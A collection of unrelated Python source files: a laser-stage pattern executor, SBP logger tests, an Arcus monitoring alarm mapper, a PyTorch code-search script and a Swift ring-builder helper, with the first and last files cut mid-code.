self._execute_arc(controller, pattern)
elif kind == 'CircularContourPattern':
self._execute_contour(controller, pattern)
elif kind in ('SeekPattern', 'DragonFlyPeakPattern'):
self._execute_seek(controller, pattern)
else:
self._execute_points(controller, pattern, multipoint=False)
def _execute_points(self, controller, pattern, multipoint=False):
pts = pattern.points_factory()
if multipoint:
controller.multiple_point_move(pts, velocity=pattern.velocity)
else:
for x, y in pts:
if not self.isPatterning():
break
controller.linear_move(x, y, block=True,
velocity=pattern.velocity)
def _execute_contour(self, controller, pattern):
for ni in range(pattern.nsteps):
if not self.isPatterning():
break
r = pattern.radius * (1 + ni * pattern.percent_change)
self.info('doing circular contour {} {}'.format(ni + 1, r))
controller.single_axis_move('x', pattern.cx + r,
block=True)
controller.arc_move(pattern.cx, pattern.cy, 360,
block=True)
time.sleep(0.1)
def _execute_arc(self, controller, pattern):
controller.single_axis_move('x', pattern.radius, block=True)
controller.arc_move(pattern.cx, pattern.cy, pattern.degrees, block=True)
def _execute_seek(self, controller, pattern):
duration = pattern.duration
total_duration = pattern.total_duration
lm = self.laser_manager
sm = lm.stage_manager
ld = sm.lumen_detector
ld.mask_kind = pattern.mask_kind
ld.custom_mask = pattern.custom_mask_radius
osdp = sm.canvas.show_desired_position
sm.canvas.show_desired_position = False
st = time.time()
self.debug('Pre seek delay {}'.format(pattern.pre_seek_delay))
time.sleep(pattern.pre_seek_delay)
self.debug('starting seek')
self.debug('total duration {}'.format(total_duration))
self.debug('dwell duration {}'.format(duration))
if pattern.kind == 'DragonFlyPeakPattern':
try:
self._dragonfly_peak(st, pattern, lm, controller)
except BaseException as e:
self.critical('Dragonfly exception. {}'.format(e))
else:
self._hill_climber(st, controller, pattern)
sm.canvas.show_desired_position = osdp
from pyface.gui import GUI
GUI.invoke_later(self._info.dispose)
def _dragonfly_peak(self, st, pattern, lm, controller):
# imgplot, imgplot2, imgplot3 = pattern.setup_execution_graph()
# imgplot, imgplot2 = pattern.setup_execution_graph()
imgplot, imgplot2 = pattern.setup_execution_graph(nplots=2)
cx, cy = pattern.cx, pattern.cy
sm = lm.stage_manager
linear_move = controller.linear_move
in_motion = controller.in_motion
find_lum_peak = sm.find_lum_peak
pxpermm = sm.pxpermm
set_data = imgplot.data.set_data
set_data2 = imgplot2.data.set_data
# set_data3 = imgplot3.data.set_data
duration = pattern.duration
sat_threshold = pattern.saturation_threshold
total_duration = pattern.total_duration
min_distance = pattern.min_distance
aggressiveness = pattern.aggressiveness
update_period = pattern.update_period / 1000.
move_threshold = pattern.move_threshold
blur = pattern.blur
px, py = cx, cy
ncx, ncy = cx, cy
point_gen = None
cnt = 0
# peak = None
oimg = sm.get_preprocessed_src()
pos_img = zeros_like(oimg, dtype='int16')
per_img = zeros_like(oimg, dtype='int16')
img_h, img_w = pos_img.shape
perimeter_circle = circle(img_h / 2, img_w / 2, pattern.perimeter_radius * pxpermm)
color = 2**15-1
per_img[perimeter_circle] = 50
set_data('imagedata', gray2rgb(per_img.astype(uint8)))
while time.time() - st < total_duration:
if not self._alive:
break
sats = []
pts = []
ist = time.time()
npt = None
self.debug('starting iteration={}, in_motion={}'.format(cnt, in_motion()))
while time.time() - ist < duration or in_motion():
args = find_lum_peak(min_distance, blur)
if args is None:
sleep(update_period/5)
continue
sleep(update_period)
pt, peakcol, peakrow, peak_img, sat, src = args
sats.append(sat)
# if peak is None:
# peak = peak_img
# else:
# peak = ((peak.astype('int16') - 2) + peak_img).clip(0, 255)
# img = gray2rgb(peak).astype(uint8)
src = gray2rgb(src).astype(uint8)
if pt:
pts.append(pt)
c = circle(peakrow, peakcol, 2)
# img[c] = (255, 0, 0)
src[c] = (255, 0, 0)
# set_data('imagedata', src)
set_data2('imagedata', src)
# set_data('imagedata', img)
self.debug('iteration {} finished, npts={}'.format(cnt, len(pts)))
pattern.position_str = NULL_STR
if pts:
w = array(sats)
avg_sat_score = w.mean()
self.debug('Average Saturation: {} threshold={}'.format(avg_sat_score, sat_threshold))
pattern.average_saturation = avg_sat_score
if avg_sat_score < sat_threshold:
# pts = array(pts)
x, y, w = array(pts).T
ws = w.sum()
nx = (x * w).sum() / ws
ny = (y * w).sum() / ws
self.debug('New point {},{}'.format(nx, ny))
npt = nx, ny, 1
else:
continue
if npt is None:
if not point_gen:
point_gen = pattern.point_generator()
# wait = False
x, y = next(point_gen)
px, py = ncx + x, ncy + y
self.debug('generating new point={},{} ---- {},{}'.format(x, y, px, py))
else:
point_gen = None
# wait = True
if npt is None:
block = total_duration - (time.time() - st) < duration
linear_move(cx, cy, source='recenter_dragonfly{}'.format(cnt), block=block,
velocity=pattern.velocity,
use_calibration=False)
pattern.position_str = 'Return to Center'
px, py = cx, cy
continue
try:
scalar = npt[2]
except IndexError:
scalar = 1
ascalar = scalar * aggressiveness
dx = npt[0] / pxpermm * ascalar
dy = npt[1] / pxpermm * ascalar
if abs(dx) < move_threshold or abs(dy) < move_threshold:
self.debug('Deviation too small dx={},dy={}'.format(dx, dy, move_threshold))
pattern.position_str = 'Deviation too small'
continue
px += dx
py -= dy
self.debug('i: {}. point={},{}. '
'Intensitiy Scalar={}, Modified Scalar={}'.format(cnt, px, py, scalar, ascalar))
ncx, ncy = px, py
if not pattern.validate(px, py):
self.debug('invalid position. {},{}'.format(px, py))
curx = px - dx
cury = py + dy
vx = curx - cx
vy = cury - cy
px = vx * aggressiveness + cx
py = vy * aggressiveness + cy
self.debug('reduced vector magnitude. new pos={},{}'.format(px, py))
# for safety validate this new position
# if above calculation is correct the new position should always be valid
if not pattern.validate(px, py):
self.debug('vector calculations incorrect. moving to center position')
px, py = cx, cy
ncx, ncy = px, py
pattern.position_str = '{:0.5f},{:0.5f}'.format(px, py)
# if there is less than 1 duration left then block is true
block = total_duration - (time.time() - st) < duration
self.debug('blocking ={}'.format(block))
linear_move(px, py, source='dragonfly{}'.format(cnt), block=block, velocity=pattern.velocity,
use_calibration=False)
ay, ax = py - cy, px - cx
# self.debug('position mm ax={},ay={}'.format(ax, ay))
ay, ax = int(-ay * pxpermm) + img_h / 2, int(ax * pxpermm) + img_w / 2
# self.debug('position pixel ax={},ay={}'.format(ax, ay))
pos_img -= 5
pos_img = pos_img.clip(0, color)
c = circle(ay, ax, 2)
pos_img[c] = color - 60
nimg = ((pos_img + per_img).astype(uint8))
set_data('imagedata', gray2rgb(nimg))
cnt += 1
self.debug('dragonfly complete')
controller.block()
def _hill_climber(self, st, controller, pattern):
g = pattern.execution_graph
imgplot, cp = pattern.setup_execution_graph()
cx, cy = pattern.cx, pattern.cy
sm = self.laser_manager.stage_manager
linear_move = controller.linear_move
get_scores = sm.get_scores
moving = sm.moving
update_axes = sm.update_axes
set_data = imgplot.data.set_data
sat_threshold = pattern.saturation_threshold
total_duration = pattern.total_duration
duration = pattern.duration
pattern.perimeter_radius *= sm.pxpermm
avg_sat_score = -1
# current_x, current_y =None, None
for i, pt in enumerate(pattern.point_generator()):
update_plot = True
x, y = pt.x, pt.y
ax, ay = cx + x, cy + y
if not self._alive:
break
if time.time() - st > total_duration:
break
# use_update_point = False
if avg_sat_score < sat_threshold:
# use_update_point = False
# current_x, current_y = x, y
linear_move(ax, ay, block=False, velocity=pattern.velocity,
use_calibration=False,
update=False,
immediate=True)
else:
self.debug('Saturation target reached. not moving')
update_plot = False
density_scores = []
ts = []
saturation_scores = []
positions = []
def measure_scores(update=False):
if update:
update_axes()
positions.append((controller.x, controller.y))
score_density, score_saturation, img = get_scores()
density_scores.append(score_density)
saturation_scores.append(score_saturation)
set_data('imagedata', img)
ts.append(time.time() - st)
time.sleep(0.1)
while moving(force_query=True):
measure_scores(update=True)
mt = time.time()
while time.time() - mt < duration:
measure_scores()
if density_scores:
n = len(density_scores)
density_scores = array(density_scores)
saturation_scores = array(saturation_scores)
weights = [1 / (max(0.0001, ((xi - ax) ** 2 + (yi - ay) ** 2)) ** 0.5) for xi, yi in positions]
avg_score = average(density_scores, weights=weights)
avg_sat_score = average(saturation_scores, weights=weights)
score = avg_score
m, b = polyfit(ts, density_scores, 1)
if m > 0:
score *= (1 + m)
pattern.set_point(score, pt)
self.debug('i:{} XY:({:0.5f},{:0.5f})'.format(i, x, y))
self.debug('Density. AVG:{:0.3f} N:{} Slope:{:0.3f}'.format(avg_score, n, m))
self.debug('Modified Density Score: {:0.3f}'.format(score))
self.debug('Saturation. AVG:{:0.3f}'.format(avg_sat_score))
if update_plot:
cp.add_point((x, y))
g.add_datum((x, y), plotid=0)
t = time.time() - st
g.add_datum((t, avg_score), plotid=1)
# g.add_bulk_data(ts, density_scores, plotid=1, series=1)
g.add_datum((t, score),
ypadding='0.1',
ymin_anchor=-0.1,
update_y_limits=True, plotid=1)
update_axes()
# ============= EOF =============================================
|
test_logger.py
|
#!/usr/bin/env python
# Copyright (C) 2015 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
import pytest
pytest.importorskip("numpy")
from sbp.msg import SBP
from sbp.client.loggers.base_logger import LogIterator
from sbp.client.loggers.json_logger import JSONLogIterator
from sbp.client.loggers.rotating_logger import RotatingFileLogger
from sbp.client.loggers.udp_logger import UdpLogger
from sbp.acquisition import MsgAcqResultDepA
from sbp.logging import MsgPrintDep
from sbp.table import _SBP_TABLE, dispatch
from sbp.table import InvalidSBPMessageType
import six
from six.moves import socketserver
import threading
import os, tempfile, time
import warnings
def test_log():
"""
Abstract interface won't work
"""
log_datafile = "./data/serial_link_log_20150310-115522-test.log.dat"
with open(log_datafile, 'r') as infile:
with LogIterator(infile) as log:
with pytest.raises(NotImplementedError) as exc_info:
for msg, metadata in next(log):
pass
assert exc_info.value.args[0] == "next() not implemented!"
def _json_log(conventional, fetch_next):
log_datafile = "./data/serial_link_log_20150310-115522-test.log.dat"
count = 0
with warnings.catch_warnings(record=True) as w:
with open(log_datafile, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
for msg, metadata in fetch_next(log):
assert type(metadata['time']) == six.text_type
assert isinstance(msg, SBP) or issubclass(type(msg), SBP)
count += 1
warnings.simplefilter("always")
assert len(w) == 0
assert count == 2650
def test_json_log():
"""
JSON log iterator sanity tests.
"""
_json_log(conventional=False, fetch_next = lambda x : next(x))
_json_log(conventional=True, fetch_next = lambda x : x)
def _non_utf8_json_log(conventional, fetch_next):
log_datafile = "./data/serial_link_non_utf8.log.dat"
with warnings.catch_warnings(record=True) as w:
with open(log_datafile, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
for _, _ in fetch_next(log):
pass
warnings.simplefilter("always")
assert len(w) == 1
def test_non_utf8_json_log():
"""
JSON log iterator sanity tests.
"""
_non_utf8_json_log(conventional=False, fetch_next = lambda x : next(x))
_non_utf8_json_log(conventional=True, fetch_next = lambda x : x)
def _msg_print(conventional, fetch_next):
log_datafile = "./data/serial_link_log_20150428-084729.log.dat"
with open(log_datafile, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
with warnings.catch_warnings(record=True) as w:
for _, _ in fetch_next(log):
pass
warnings.simplefilter("always")
# Check for warnings.
assert len(w) == 1
assert issubclass(w[0].category, RuntimeWarning)
assert str(w[0].message).startswith('Bad message parsing for line')
@pytest.mark.xfail
def test_msg_print():
"""
"""
_msg_print(conventional=False, fetch_next = lambda x : next(x))
_msg_print(conventional=True, fetch_next = lambda x : x)
def udp_handler(data):
class MockRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
assert data == self.request[0].strip()
return MockRequestHandler
class MockServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
def udp_server(handler):
server = MockServer(("localhost", 0), handler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return (ip, port)
def test_udp_logger():
msg = SBP(1, 2, 3, b'abc', 4)
handler = udp_handler(msg.pack())
ip, port = udp_server(handler)
with UdpLogger(ip, port) as udp:
udp(msg)
def _rolling_json_log(conventional, fetch_next):
"""
Rolling JSON log iterator sanity tests.
"""
# Duration of test
test_interval = 6
# Rotating interval
r_interval = 2
try:
with tempfile.NamedTemporaryFile(mode='w', delete=False) as tf:
#print tf.name
with RotatingFileLogger(tf.name, when='S', interval=r_interval) as log:
t0 = time.time()
t = time.time()
msg = SBP(0x10, 2, 3, b'abc\n', 4)
msgs = []
while t - t0 < test_interval:
log(msg, delta=t-t0, timestamp=t)
if t - t0 <= r_interval:
msgs.append(msg)
t = time.time()
i = 0
with open(tf.name, 'r') as infile:
with JSONLogIterator(infile, conventional=conventional) as log:
for msg, _ in fetch_next(log):
assert isinstance(msg, MsgPrintDep)
assert msg.text == b"abc\n"
i += 1
assert i > 0
assert i <= len(msgs)
except Exception:
raise
finally:
os.unlink(tf.name)
@pytest.mark.slow
def test_rolling_json_log():
"""
Rolling JSON log iterator sanity tests.
"""
_rolling_json_log(conventional=False, fetch_next = lambda x : next(x))
_rolling_json_log(conventional=True, fetch_next = lambda x : x)
|
arcus_alarm.py
|
#
# Hubblemon - Yet another general purpose system monitor
#
# Copyright 2015 NAVER Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import socket, fnmatch, pickle, sys, os, threading
import arcus_mon.settings
import arcus_mon.arcus_driver.arcus_util
from arcus_mon.arcus_driver.arcus_util import zookeeper
hubblemon_path = os.path.join(os.path.dirname(__file__), '..')
sys.path.append(hubblemon_path)
import common.settings
import common.core
class arcus_alarm:
def __init__(self):
self.name = 'arcus'
self.sec_interval = 5 # 5 sec interval
self.node_cloud_map = {}
self.node_cloud_map_init()
def _node_cloud_map_init(self, addr):
zoo = zookeeper(addr)
nodes = zoo.get_arcus_node_all()
for node in nodes:
self.node_cloud_map[node.ip + ":" + node.port] = node.code
def node_cloud_map_init(self):
print('# cloud map init')
threads = []
for addr in common.settings.arcus_zk_addrs:
th = threading.Thread(target = self._node_cloud_map_init, args = (addr,))
th.start()
threads.append(th)
for th in threads:
th.join()
print('# cloud map init done')
def get_cloud_of_node(self, name, port):
try:
ip = socket.gethostbyname(name)
except Exception as e:
print(e)
print('# exception: %s' % name)
return None
key = ip + ':' + port
if key not in self.node_cloud_map:
# retry with ip:0 # implicit define
key = ip + ':0'
if key not in self.node_cloud_map:
return None
return self.node_cloud_map[key]
def select_cloud_conf(self, cloud, map):
ret = {}
if 'default' in map:
ret = map['default'].copy()
# exact
if cloud in map:
# overwrite
for k, v in map[cloud].items():
ret[k] = v
else:
# wild card match
for key, value in map.items():
# overwrite if match like linegame-*
if fnmatch.fnmatch(cloud, key):
for k, v in value.items():
ret[k] = v
return ret
def get_conf(self, client, instance): # client: machine name, instance: arcus port
if not instance.isnumeric(): # TODO: ignore prefix
return (None, None, None)
cloud = self.get_cloud_of_node(client, instance)
if cloud == None:
print('## None type of node cloud mapping %s, %s' % (client, instance))
return (None, None, None)
# select exact conf
abs_conf = self.select_cloud_conf(cloud, arcus_mon.settings.alarm_conf_absolute)
lambda_conf = self.select_cloud_conf(cloud, arcus_mon.settings.alarm_conf_lambda)
instance_id = '%s:%s-%s' % (cloud, client, instance)
return (instance_id, abs_conf, lambda_conf)
|
main.py
|
import os
import sys
import random
import traceback
import numpy as np
import math
from math import log
import argparse
from datashape.coretypes import real
random.seed(42)
import threading
import codecs
from tqdm import tqdm
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(message)s")
import torch
from torch import optim
import torch.nn.functional as F
from utils import cos_np, normalize, dot_np, sent2indexes
from configs import get_config
from data_loader import load_dict, CodeSearchDataset, load_vecs, save_vecs
import models
class CodeSearcher:
def __init__(self, conf):
self.conf=conf
self.path = conf['workdir']
self.vocab_methname = load_dict(self.path+conf['vocab_name'])
self.vocab_apiseq=load_dict(self.path+conf['vocab_api'])
self.vocab_tokens=load_dict(self.path+conf['vocab_tokens'])
self.vocab_desc=load_dict(self.path+conf['vocab_desc'])
self.codevecs=[]
self.codebase= []
self.codebase_chunksize=2000000
self.valid_set = None
##### Data Set #####
def load_codebase(self):
"""load codebase
codefile: h5 file that stores raw code
"""
logger.info('Loading codebase (chunk size={})..'.format(self.codebase_chunksize))
if not self.codebase: #empty
codes=codecs.open(self.path+self.conf['use_codebase']).readlines()
#use codecs to read in case of encoding problem
for i in range(0,len(codes),self.codebase_chunksize):
self.codebase.append(codes[i:i+self.codebase_chunksize])
### Results Data ###
def load_codevecs(self):
logger.debug('Loading code vectors..')
if not self.codevecs: # empty
"""read vectors (2D numpy array) from a hdf5 file"""
reprs=load_vecs(self.path+self.conf['use_codevecs'])
for i in range(0,reprs.shape[0], self.codebase_chunksize):
self.codevecs.append(reprs[i:i+self.codebase_chunksize])
##### Model Loading / saving #####
def save_model(self, model, epoch):
if not os.path.exists(self.path+'models/'):
os.makedirs(self.path+'models/')
torch.save(model.state_dict(), self.path+'models/epo%d.h5' % epoch)
def load_model(self, model, epoch):
assert os.path.exists(self.path+'models/epo%d.h5'%epoch), 'Weights at epoch %d not found' % epoch
model.load_state_dict(torch.load(self.path+'models/epo%d.h5' % epoch))
##### Training #####
def train(self, model):
model.train()
log_every = self.conf['log_every']
valid_every = self.conf['valid_every']
save_every = self.conf['save_every']
batch_size = self.conf['batch_size']
nb_epoch = self.conf['nb_epoch']
train_set = CodeSearchDataset(self.path,
self.conf['train_name'],self.conf['name_len'],
self.conf['train_api'],self.conf['api_len'],
self.conf['train_tokens'],self.conf['tokens_len'],
self.conf['train_desc'],self.conf['desc_len'])
data_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=self.conf['batch_size'],
shuffle=True, drop_last=True, num_workers=1)
val_loss = {'loss': 1., 'epoch': 0}
for epoch in range(self.conf['reload']+1, nb_epoch):
itr = 1
losses=[]
for names, apis, toks, good_descs, bad_descs in data_loader:
names, apis, toks, good_descs, bad_descs = [tensor.to(self.device) for tensor in [names, apis, toks, good_descs, bad_descs]]
loss = model(names, apis, toks, good_descs, bad_descs)
losses.append(loss.item())
optimizer.zero_grad()
loss.backward()
optimizer.step()
if itr % log_every ==0:
logger.info('epo:[%d/%d] itr:%d Loss=%.5f'%(epoch, nb_epoch, itr, np.mean(losses)))
losses=[]
itr = itr + 1
# if epoch and epoch % valid_every == 0:
# logger.info("validating..")
# acc1, mrr, map, ndcg = self.eval(model,1000,1)
if epoch and epoch % save_every == 0:
self.save_model(model, epoch)
##### Evaluation #####
def eval(self, model, poolsize, K):
"""
simple validation in a code pool.
@param: poolsize - size of the code pool, if -1, load the whole test set
"""
def ACC(real,predict):
sum=0.0
for val in real:
try:
index=predict.index(val)
except ValueError:
index=-1
if index!=-1:
sum=sum+1
return sum/float(len(real))
def MAP(real,predict):
sum=0.0
for id,val in enumerate(real):
try:
index=predict.index(val)
except ValueError:
index=-1
if index!=-1:
sum=sum+(id+1)/float(index+1)
return sum/float(len(real))
def MRR(real,predict):
sum=0.0
for val in real:
try:
index=predict.index(val)
except ValueError:
index=-1
if index!=-1:
sum=sum+1.0/float(index+1)
return sum/float(len(real))
def NDCG(real,predict):
dcg=0.0
idcg=IDCG(len(real))
for i,predictItem in enumerate(predict):
if predictItem in real:
itemRelevance=1
rank = i+1
dcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(rank+1))
return dcg/float(idcg)
def IDCG(n):
idcg=0
itemRelevance=1
for i in range(n):
idcg+=(math.pow(2,itemRelevance)-1.0)*(math.log(2)/math.log(i+2))
return idcg
if self.valid_set is None: #load test dataset
self.valid_set=CodeSearchDataset(self.path,
self.conf['valid_name'],self.conf['name_len'],
self.conf['valid_api'],self.conf['api_len'],
self.conf['valid_tokens'],self.conf['tokens_len'],
self.conf['valid_desc'],self.conf['desc_len'])
data_loader = torch.utils.data.DataLoader(dataset=self.valid_set, batch_size=poolsize,
shuffle=True, drop_last=True, num_workers=1)
model.eval()
accs,mrrs,maps,ndcgs=[],[],[],[]
for names, apis, toks, descs, _ in tqdm(data_loader):
names, apis, toks, descs = [tensor.to(self.device) for tensor in [ names, apis, toks, descs]]
code_repr=model.code_encoding(names, apis, toks)
for i in range(poolsize):
desc=descs[i].expand(poolsize,-1)
desc_repr=model.desc_encoding(desc)
n_results = K
sims = F.cosine_similarity(code_repr, desc_repr).data.cpu().numpy()
negsims=np.negative(sims)
predict=np.argsort(negsims)#predict = np.argpartition(negsims, kth=n_results-1)
predict = predict[:n_results]
predict = [int(k) for k in predict]
real=[i]
accs.append(ACC(real,predict))
mrrs.append(MRR(real,predict))
maps.append(MAP(real,predict))
ndcgs.append(NDCG(real,predict))
logger.info('ACC={}, MRR={}, MAP={}, nDCG={}'.format(np.mean(accs),np.mean(mrrs),np.mean(maps),np.mean(ndcgs)))
return np.mean(accs),np.mean(mrrs),np.mean(maps),np.mean(ndcgs)
##### Compute Representation #####
def repr_code(self,model):
model.eval()
vecs=None
use_set = CodeSearchDataset(self.conf['workdir'],
self.conf['use_names'],self.conf['name_len'],
self.conf['use_apis'],self.conf['api_len'],
self.conf['use_tokens'],self.conf['tokens_len'])
data_loader = torch.utils.data.DataLoader(dataset=use_set, batch_size=1000,
shuffle=False, drop_last=False, num_workers=1)
for names,apis,toks in data_loader:
names, apis, toks = [tensor.to(self.device) for tensor in [names, apis, toks]]
reprs = model.code_encoding(names,apis,toks).data.cpu().numpy()
vecs=reprs if vecs is None else np.concatenate((vecs, reprs),0)
vecs = normalize(vecs)
save_vecs(vecs,self.path+self.conf['use_codevecs'])
return vecs
def search(self,model,query,n_results=10):
model.eval()
desc=sent2indexes(query, self.vocab_desc)#convert desc sentence into word indices
desc = np.expand_dims(desc, axis=0)
desc= torch.from_numpy(desc).to(self.device)
desc_repr=model.desc_encoding(desc).data.cpu().numpy()
codes=[]
sims=[]
threads=[]
for i, codevecs_chunk in enumerate(self.codevecs):
t = threading.Thread(target=self.search_thread, args = (codes,sims,desc_repr, codevecs_chunk,i,n_results))
threads.append(t)
for t in threads:
t.start()
for t in threads:#wait until all sub-threads finish
t.join()
return codes,sims
def search_thread(self,codes,sims,desc_repr,codevecs,i,n_results):
#1. compute code similarities
chunk_sims=dot_np(normalize(desc_repr),codevecs)
#2. choose the top K results
negsims=np.negative(chunk_sims[0])
maxinds = np.argpartition(negsims, kth=n_results-1)
maxinds = maxinds[:n_results]
chunk_codes=[self.codebase[i][k] for k in maxinds]
chunk_sims=chunk_sims[0][maxinds]
codes.extend(chunk_codes)
sims.extend(chunk_sims)
def parse_args():
parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model")
parser.add_argument('--model', type=str, default='JointEmbeder', help='model name')
parser.add_argument("--mode", choices=["train","eval","repr_code","search"], default='train',
help="The mode to run. The `train` mode trains a model;"
" the `eval` mode evaluat models in a test set "
" The `repr_code/repr_desc` mode computes vectors"
" for a code snippet or a natural language description with a trained model.")
parser.add_argument('--gpu_id', type=int, default=0, help='GPU ID')
parser.add_argument("--verbose",action="store_true", default=True, help="Be verbose")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
device = torch.device(f"cuda:{args.gpu_id}" if torch.cuda.is_available() else "cpu")
conf = get_config()
searcher = CodeSearcher(conf)
searcher.device = device
##### Define model ######
logger.info('Build Model')
model = getattr(models, args.model)(conf)#initialize the model
if conf['reload']>0:
searcher.load_model(model, conf['reload'])
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=conf['lr'])
if args.mode=='train':
searcher.train(model)
elif args.mode=='eval':
# evaluate for a particular epoch
searcher.eval(model,1000,10)
elif args.mode=='repr_code':
vecs=searcher.repr_code(model)
elif args.mode=='search':
#search code based on a desc
searcher.load_codevecs()
searcher.load_codebase()
while True:
try:
query = input('Input Query: ')
n_results = int(input('How many results? '))
except Exception:
print("Exception while parsing your input:")
traceback.print_exc()
break
codes,sims=searcher.search(model, query,n_results)
zipped=zip(codes,sims)
results = '\n\n'.join(map(str,zipped)) #combine the result into a returning string
print(results)
|
swift_rings.py
|
#!/usr/bin/env python
# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from optparse import OptionParser
from os.path import exists
from swift.cli.ringbuilder import main as rb_main
import pickle
import sys
import threading
import json
import copy
USAGE = "usage: %prog -f <swift_ring.contents>"
DEVICE_KEY = "%(ip)s:%(port)d/%(device)s"
class RingValidationError(Exception):
pass
def create_buildfile(build_file, part_power, repl, min_part_hours,
update=False, data=None, validate=False):
if update:
# build file exists, so lets just update the existing build file
if not data:
data = get_build_file_data(build_file)
if data is None:
data = {}
if repl != data.get('replicas') and not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file,
"set_replicas", repl])
if min_part_hours != data.get('min_part_hours') and not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file,
"set_min_part_hours", min_part_hours])
if part_power != data.get('part_power'):
raise RingValidationError('Part power cannot be changed! '
'you must rebuild the ring if you need '
'to change it.\nRing part power: %s '
'Inventory part power: %s'
%(data.get('part_power'), part_power))
elif not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file, "create",
part_power, repl, min_part_hours])
def change_host_weight(build_file, host_search_str, weight):
run_and_wait(rb_main, ["swift-ring-builder", build_file, "set_weight",
host_search_str, weight])
def remove_host_from_ring(build_file, host):
run_and_wait(rb_main, ["swift-ring-builder", build_file, "remove",
host])
def update_host_in_ring(build_file, new_host, old_host, validate=False):
if new_host.get('zone', 0) != old_host['zone']:
devstr = DEVICE_KEY % new_host
raise RingValidationError('Cannot update zone on %s, this can only be '
'done when the drive is added' % (devstr))
if new_host.get('region', 1) != old_host['region']:
devstr = DEVICE_KEY % new_host
raise RingValidationError('Cannot update region on %s, this can only '
'be done when the drive is added' % (devstr))
try:
r_ip = new_host.get('repl_ip', new_host['ip'])
r_port = new_host.get('repl_port', new_host['port'])
weight = new_host.get('weight')
if r_ip != old_host['replication_ip'] or \
r_port != old_host['replication_port']:
host_d = {'r_ip': r_ip, 'r_port': r_port}
host_d.update(new_host)
host_str = "%(ip)s:%(port)dR%(r_ip)s:%(r_port)d/%(device)s" % host_d
if not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file,
"set_info", DEVICE_KEY % new_host,
host_str])
except Exception as ex:
raise RingValidationError(ex)
if weight != old_host['weight'] and not validate:
change_host_weight(build_file, DEVICE_KEY % new_host, weight)
def add_host_to_ring(build_file, host, validate=False):
host_str = ""
try:
if host.get('region') is not None:
host_str += 'r%(region)d' % host
host_str += "z%d" % (host.get('zone'))
host_str += "-%(ip)s:%(port)d" % host
if host.get('repl_ip'):
r_ip = host['repl_ip']
r_port = host.get('repl_port', host['port'])
host_str += "R%s:%d" % (r_ip, r_port)
elif host.get('repl_port'):
r_ip = host.get('repl_ip', host['ip'])
r_port = host['repl_port']
host_str += "R%s:%d" % (r_ip, r_port)
host_str += "/%(device)s" % host
weight = host.get('weight')
except Exception as ex:
raise RingValidationError(ex)
if not validate:
run_and_wait(rb_main, ["swift-ring-builder", build_file, 'add',
host_str, str(weight)])
def run_and_wait(func, *args):
t = threading.Thread(target=func, args=args)
t.start()
return t.join()
def has_section(conf, section):
return True if conf.get(section) else False
def check_section(conf, section):
if not has_section(conf, section):
print("Section %s doesn't exist" % (section))
sys.exit(2)
def get_build_file_data(build_file):
build_file_data = None
if exists(build_file):
try:
with open(build_file) as bf_stream:
build_file_data = pickle.load(bf_stream)
except Exception as ex:
print("Error: failed to load build file '%s': %s" % (build_file,
ex))
build_file_data = None
return build_file_data
def build_ring(build_name, repl, min_part_hours, part_power, hosts, validate=False):
# Create the build file
build_file = "%s.builder" % (build_name)
build_file_data = get_build_file_data(build_file)
update = build_file_data is not None
create_buildfile(build_file, part_power, repl, min_part_hours, update,
data=build_file_data, validate=validate)
old_hosts = {}
if update:
for i, dev in enumerate(build_file_data['devs']):
if dev is not None:
old_hosts[DEVICE_KEY % dev] = i
for host in hosts:
host_key = DEVICE_KEY % host
if host_key in old_hosts:
old_host = build_file_data['devs'][old_hosts[host_key]]
update_host_in_ring(build_file, host, old_host,
validate=validate)
old_hosts.pop(host_key)
else:
add_host_to_ring(build_file, host, validate=validate)
if old_hosts and not validate:
# There are still old hosts, these hosts must've been removed
for host in old_hosts:
remove_host_from_ring(build_file, host)
# Rebalance ring
if not validate:
if not hosts:
run_and_wait(rb_main, ["swift-ring-builder", build_file, "write_ring"])
else:
run_and_wait(rb_main, ["swift-ring-builder", build_file, "rebalance"])
def main(setup):
# load the json file
try:
with open(setup) as json_stream:
_contents_file = json.load(json_stream)
except Exception as ex:
print("Failed to load json string %s" % (ex))
return 1
hosts = _contents_file['drives']
kargs = {'validate': True, 'hosts': hosts}
ring_call = [ _contents_file['builder_file'],
_contents_file['repl_number'],
_contents_file['min_part_hours'],
_contents_file['part_power']]
try:
build_ring(*ring_call, **kargs)
except RingValidationError as ex:
print(ex)
return 2
# If the validation passes lets go ahead and build the rings.
